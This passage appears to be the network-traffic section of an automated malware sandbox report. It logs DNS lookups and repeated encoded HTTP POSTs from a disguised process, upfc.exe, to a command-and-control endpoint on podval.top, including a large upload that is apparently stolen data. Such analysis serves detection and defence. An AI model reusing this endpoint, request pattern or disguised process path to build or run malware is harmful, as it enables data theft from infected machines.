                                                    Jul 3, 2024 16:44:09.077672958 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:09.077800035 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:09.411777973 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:09.463274956 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:10.418082952 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:10.423098087 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:10.517961979 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:10.518393993 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:10.523312092 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:10.523411989 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:10.854902983 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:10.900840998 CEST4983080192.168.2.10188.114.97.3

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 3, 2024 16:42:09.438317060 CEST5027053192.168.2.101.1.1.1
                                                    Jul 3, 2024 16:42:09.472083092 CEST53502701.1.1.1192.168.2.10

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 3, 2024 16:42:09.438317060 CEST192.168.2.101.1.1.10x17dfStandard query (0)podval.topA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 3, 2024 16:42:09.472083092 CEST1.1.1.1192.168.2.100x17dfNo error (0)podval.top188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 3, 2024 16:42:09.472083092 CEST1.1.1.1192.168.2.100x17dfNo error (0)podval.top188.114.96.3A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • podval.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1049707188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:09.488838911 CEST293OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:09.839222908 CEST344OUTData Raw: 00 05 04 0c 06 0f 01 05 05 06 02 01 02 01 01 04 00 0a 05 0e 02 04 03 0b 07 06 0e 07 04 05 01 02 0e 05 03 0e 00 03 04 57 0f 00 02 03 00 06 02 01 07 02 0c 00 0c 05 07 52 05 06 04 54 07 05 00 09 05 00 0f 0d 05 53 04 56 0c 02 0b 04 0e 02 0c 04 04 0d
                                                    Data Ascii: WRTSVWQQ\L}ThNq\`byvKlhouw|tBshK{UoEz`fkn|c^`L}O~V@{C\}r}
                                                    Jul 3, 2024 16:42:09.935415030 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:10.468069077 CEST1236INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=loc6lG5wKWm7ZbSkpAX1q2PREiPYgzjPYqD7AJiSEJYWD6iYpdyeB9XIWxNfb88BcCB%2FSX%2BSMYmzq8xEdtBokvnPuopUAGGbZNzAedrTuhSXSfD3A01dyYyP4F%2B7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a3fbdbd44369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 35 35 34 0d 0a 56 4a 7e 00 6c 6d 74 58 6c 62 68 46 7e 62 60 59 7e 01 70 54 7f 5e 57 42 7a 60 7f 58 7e 04 7f 5b 77 4d 53 09 79 62 76 5e 61 66 78 4a 7d 5b 78 01 55 4b 72 51 77 71 6b 4a 6b 04 66 5c 7c 77 5b 54 6f 5f 63 55 7e 4d 70 5a 75 71 75 04 74 07 6a 5d 68 4f 71 5b 7d 6c 63 51 69 5e 67 03 75 5c 7b 06 7c 5b 76 5c 7e 59 7d 07 7b 67 55 5c 7b 01 6c 42 78 54 74 59 6e 5c 78 01 6f 5d 54 04 6b 4e 55 59 7b 49 70 00 69 71 73 04 75 07 6c 47 7a 51 41 5b 68 5e 67 54 7f 5f 57 40 77 7c 78 07 78 7c 60 03 77 63 6d 50 7b 61 53 04 69 7c 75 5e 7a 61 72 05 77 60 7f 07 76 71 5e 06 60 5f 5c 50 7e 5d 79 5f 77 62 6e 5d 76 66 7c 09 68 52 65 05 77 6f 60 04 7f 73 6f 59 6f 6f 7f 03 7b 5e 66 06 7c 6d 6f 51 77 01 7f 5e 69 62 6e 09 69 53 73 4f 7a 6d 5f 5e 7e 61 7d 07 7b 5d 46 51 7d 7c 70 43 69 60 77 54 7d 74 65 59 78 6d 55 07 78 62 56 00 7c 4f 51 07 7d 74 60 50 7f 70 5b 0c 6d 5d 5e 4f 7f 61 7c 4b 74 5a 75 51 7b 5c 79 06 75 76 64 07 7e 48 64 4e 7e 58 6d 4f 77 62 73 4a 7c 72 57 42 7f 49 6a 0a 78 76 7c 0d 7e 73 6b 48 77 62 75 06 74 [TRUNCATED]
                                                    Data Ascii: 554VJ~lmtXlbhF~b`Y~pT^WBz`X~[wMSybv^afxJ}[xUKrQwqkJkf\|w[To_cU~MpZuqutj]hOq[}lcQi^gu\{|[v\~Y}{gU\{lBxTtYn\xo]TkNUY{IpiqsulGzQA[h^gT_W@w|xx|`wcmP{aSi|u^zarw`vq^`_\P~]y_wbn]vf|hRewo`soYoo{^f|moQw^ibniSsOzm_^~a}{]FQ}|pCi`wT}teYxmUxbV|OQ}t`Pp[m]^Oa|KtZuQ{\yuvd~HdN~XmOwbsJ|rWBIjxv|~skHwbutOiI|qb~BVA}IwuO{x\SG|paK{IpCyw^LxCcz\p{cr|p|{gl|boNv_lI|lU|wV@|OSv|`O{lpIwNT@z_}I}|~{OfuMQKva|OtaT|NP@truMu[`A||WMwB|]`ylg{^fmhCvwRL~rTO|m{mn}ry}`hB|BxN~`V~I\{}sI{bp|Os|gU|peA{sl~bdtsSz_[DvHh~X|~HaAtr{bSY~Cxft}]QuLuLtq}|abK|d@gcuqk{r_J}^_xgh{g^ymUFxrpI{cr{]NZlww^iqNvqVJ}RsYdhqSb
                                                    Jul 3, 2024 16:42:10.468091011 CEST706INData Raw: 52 60 02 78 52 73 5b 63 59 6e 43 6e 5f 71 4a 6a 52 6a 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 5e 72 04 74 04 72 5f 76 65 60 0b 68 52 53 4d 63 6c 6b 5d 7e 73 68 00 6f 6c 63 45 78 70 62 07 7c 53 5d 53 74 59 60 07 7d 5b 61 54 7a 53 59
                                                    Data Ascii: R`xRs[cYnCn_qJjRj_z\yvxBagx[L~Jx^rtr_ve`hRSMclk]~sholcExpb|S]StY`}[aTzSYQoaeZS[_PrsHQorSUTQWq`CTq]DUmZkQ|SR|zTWwS~wHXojPPrffbeEQ{_S\SQuu{k\WOIiRlft}MdZvLyLvar]|OT|R~IsurhZouqVMr]ldCT{o[WnWT[cIQ`aLVwpYRF}roBua|J
                                                    Jul 3, 2024 16:42:10.532926083 CEST269OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:10.651508093 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:10.653237104 CEST384OUTData Raw: 5f 5a 5f 5a 5b 59 52 5c 58 56 55 51 50 5c 59 54 55 50 5e 5e 51 55 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_Z[YR\XVUQP\YTUP^^QUSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!19<D$4304=>9R =!X,-:$%!04-=8#2,,"['$Y 1
                                                    Jul 3, 2024 16:42:10.935858011 CEST735INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cR1vN83rK9CRUKGZJG%2FzcVtihTwfctxrvlmEU1ajo07XjH%2FUALcI3lUjqXVcqQrWGT6bodEtqfWOIV8jw%2BFx%2BIBV1i%2FGzd6TiBil8xFaIdESbGNysD2oIyo%2BQk5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a40038624369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5e 31 3a 3e 01 24 21 3f 1b 39 2d 3b 56 29 3d 2c 14 2f 39 0c 04 28 24 2a 00 2e 3d 36 18 23 2a 03 05 3c 12 2c 5f 24 20 2c 1d 36 0b 20 5b 04 1c 23 10 28 39 21 59 3f 38 23 1f 31 02 0c 1a 24 24 29 10 27 02 21 0c 24 28 2f 59 3f 28 39 1d 30 31 20 00 3d 06 08 5a 2b 34 31 07 21 1e 21 54 02 13 22 57 25 2d 2a 0f 37 1e 37 56 31 1e 21 5d 24 42 33 51 25 33 0c 1f 3d 0d 22 53 30 31 23 00 21 3c 3f 57 27 01 3e 5c 30 03 39 59 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%^1:>$!?9-;V)=,/9($*.=6#*<,_$ ,6 [#(9!Y?8#1$$)'!$(/Y?(901 =Z+41!!T"W%-*77V1!]$B3Q%3="S01#!<?W'>\09Y#(#_+)V3YT0
                                                    Jul 3, 2024 16:42:11.466447115 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:11.572489977 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:11.575800896 CEST1060OUTData Raw: 5f 51 5f 59 5b 57 57 5f 58 56 55 51 50 5f 59 5a 55 51 5e 5c 51 58 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Q_Y[WW_XVUQP_YZUQ^\QXSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z2 D$)8$3]>2#[=-.9$653U#V,>+Y4$Z;"['$Y =
                                                    Jul 3, 2024 16:42:11.860438108 CEST580INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jw66tkK4Scusblw1mt5XuM0kk8BZWNo%2FVc5m5U%2FBlZ9aklgEigYoRjMqdhvEagQhRmOIX9yrn0y9BipyzFu9RtkCEEIquW%2BtSaHhYjA386H06O7yT8xsRjj1Cbvn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4060e614369-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1049710188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:11.516130924 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:11.869474888 CEST1756OUTData Raw: 5f 55 5f 55 5e 5a 52 5c 58 56 55 51 50 59 59 50 55 5e 5e 59 51 54 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_U^ZR\XVUQPYYPU^^YQTS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]1339+Y$#4>X.#1->3)0 0;?^77,,"['$Y )
                                                    Jul 3, 2024 16:42:11.962743044 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:12.307713985 CEST727INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNR5dO3uv7rAEbxgBwdKGUcGP1%2FqPSUf5LISP6PEPSoKsCcaHO2uDJv7UUyll%2BeUt5pVDvtCeiUsw7IqXvxpRyVFgME8UeNqCQ2QoXdppw2UG9w8o5ky97DNs0nG"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4087fdd41d8-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 59 27 2a 2d 10 25 21 37 18 3a 13 3f 56 3c 2d 23 07 3b 3a 2d 5b 2a 37 26 01 3a 3e 26 52 23 2a 2d 02 28 3f 37 06 25 09 38 54 36 31 20 5b 04 1c 20 02 2b 3a 08 07 2b 01 33 1c 26 05 29 47 24 19 25 1e 26 2b 03 0c 24 28 2b 5a 3f 28 32 0e 26 22 09 58 2a 2b 2d 02 2b 19 21 07 20 34 21 54 02 13 22 51 24 03 39 53 37 0e 38 0f 26 0e 39 15 24 1a 3b 50 27 0a 21 0b 3e 55 35 0a 33 32 37 05 36 3f 27 53 26 38 08 5e 24 2d 31 10 22 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%Y'*-%!7:?V<-#;:-[*7&:>&R#*-(?7%8T61 [ +:+3&)G$%&+$(+Z?(2&"X*+-+! 4!T"Q$9S78&9$;P'!>U53276?'S&8^$-1"(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.1049711188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:12.273222923 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:12.645021915 CEST1056OUTData Raw: 5a 52 5f 5d 5b 59 57 5c 58 56 55 51 50 59 59 57 55 50 5e 58 51 5a 53 58 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZR_][YW\XVUQPYYWUP^XQZSXSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!18D$)3)>:#..$&!0'W/-< T$Z,"['$Y 5
                                                    Jul 3, 2024 16:42:12.741036892 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:13.098172903 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYastzGi9ZwMg6GjKJDwsFMaKJZAgFja0XEwRhZ%2FWIvJEWo0G0VTs5ufDsHerOAEcVpSkZhAxDnIPFnrSyzyaMfL6PTdyEmDZEP8w3OQnScvCoczP2XDfl%2Bfg4Hf"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a40d5edf5e62-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.1049713188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:13.280425072 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:13.684294939 CEST1060OUTData Raw: 5f 5b 5f 55 5b 57 52 5d 58 56 55 51 50 58 59 52 55 58 5e 54 51 5b 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_U[WR]XVUQPXYRUX^TQ[S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&_8D3)/Y'3 (>-V \.-!Z$%!$3#R8$"14[,"['$Y !
                                                    Jul 3, 2024 16:42:13.740359068 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:14.105528116 CEST574INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPz4R4LT5H2DWvPrOLIpKBHtYOnYfkqf6ty9zjxOxXbRWFUY1oegtS4hYzGBWgwNgNaWUWwZSq2X4AGe4w5iMAthz6q6DfP6i81AhejsoxLmQ9ZcZk7tZV54xFeQ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4139edb8c05-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.1049714188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:14.297962904 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:14.651113987 CEST1060OUTData Raw: 5a 55 5f 5c 5b 5e 57 5f 58 56 55 51 50 58 59 50 55 59 5e 54 51 55 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_\[^W_XVUQPXYPUY^TQUS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X1_8D&)03 *W [=9=!Z':'33S;X7 Z/"['$Y !
                                                    Jul 3, 2024 16:42:14.773724079 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:15.122445107 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAmfKKWre4HwK6FnWVHk8UL%2FOwvARMTt2QNP0oEon9Lgmnbgcx7b%2Fs2C8joY%2BBiDGPFR0cWncrwpgpjuUky%2BIQMttEyEcEbW81FxPiq%2Bf2G1YJk6OC0myB6Hqr0D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a41a0a318c69-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.1049715188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:14.859704018 CEST272OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 154732
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:15.216129065 CEST12360OUTData Raw: 5f 51 5a 5f 5b 56 52 5b 58 56 55 51 50 5b 59 56 55 5e 5e 5a 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ_[VR[XVUQP[YVU^^ZQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]293');' '>!U!-)]9>'%Z$3,-;4;<"['$Y -
                                                    Jul 3, 2024 16:42:15.221273899 CEST4944OUTData Raw: 0e 07 57 3e 2b 3b 22 22 27 0c 06 1f 36 3a 03 3a 36 0d 26 10 0c 55 18 0f 03 58 07 55 3b 04 07 1c 20 2c 0a 50 0c 0f 49 5d 27 38 28 18 3f 2f 0b 15 33 0c 29 17 38 56 27 33 35 3e 34 12 0c 34 1b 28 3f 31 0c 09 3a 2c 24 1b 31 01 10 5b 31 33 23 00 38 5c
                                                    Data Ascii: W>+;""'6::6&UXU; ,PI]'8(?/3)8V'35>44(?1:,$1[13#8\2^3.%_?.4,5Z5^,(49<%+>::W?04&2-)T>]2\@6?9#7;"$/!2[)(=/65+\X)5:[@#7>Y_%>,*0=8R[4.&(B78;^(? !\P563,/'6?0$0
                                                    Jul 3, 2024 16:42:15.221354961 CEST4944OUTData Raw: 3e 39 24 3c 3a 2a 3b 31 0d 39 09 3e 34 04 1c 55 33 2c 39 5a 0b 32 38 1c 21 34 2c 26 24 38 3c 2f 23 3e 5e 1b 3a 3e 1d 01 0c 2b 23 5c 30 1d 4a 16 36 01 18 34 3d 31 1c 38 36 5b 22 3b 27 37 03 11 0b 56 24 36 2f 58 24 5f 0c 54 15 3e 3b 37 39 1e 2e 38
                                                    Data Ascii: >9$<:*;19>4U3,9Z28!4,&$8</#>^:>+#\0J64=186[";'7V$6/X$_T>;79.8<Y<>>]6$X+(/1 ;;_\<!(60Z 1?[\X_$4$65-=T72<3$!"5\>#<.,#=Y!S&]-41($113Q-9.R)T<1=2,?#96(%1!?.=#3:=8 0=X-
                                                    Jul 3, 2024 16:42:15.221370935 CEST2472OUTData Raw: 02 3a 1a 3d 39 01 1e 5e 38 06 00 3f 37 29 3f 37 0e 2e 28 5f 33 00 5b 34 22 26 5d 3c 3a 5c 5d 1a 26 57 20 1b 39 3f 2c 2c 34 31 09 1a 30 2a 2d 14 3f 28 3e 19 39 3e 36 1b 08 04 29 36 36 3d 33 58 26 0a 2b 28 3f 0e 02 5d 2f 3d 09 59 12 5e 14 33 2b 24
                                                    Data Ascii: :=9^8?7)?7.(_3[4"&]<:\]&W 9?,,410*-?(>9>6)66=3X&+(?]/=Y^3+$9["?6<:^P'",+9Z.?%Y! /^=Z:T4#%T"'8?0SS/-0]"4%\?2"Y8496>#Z0(4;:*/;$'<"<Z:]<;_?%:5??;3;*."7&0'5Z/
                                                    Jul 3, 2024 16:42:15.221405029 CEST7416OUTData Raw: 3b 01 39 2c 2a 2f 33 3f 26 5e 24 1f 3f 39 11 00 37 39 5c 24 3f 02 58 51 37 59 2d 1b 0a 32 30 1e 21 07 20 24 3c 5f 3c 21 34 5a 3d 20 3f 29 2c 06 30 39 24 20 3f 30 1a 02 2a 2e 2e 29 0a 59 1c 5a 01 5a 25 1e 0b 1c 58 5b 0e 0c 5e 52 34 00 0a 0b 23 30
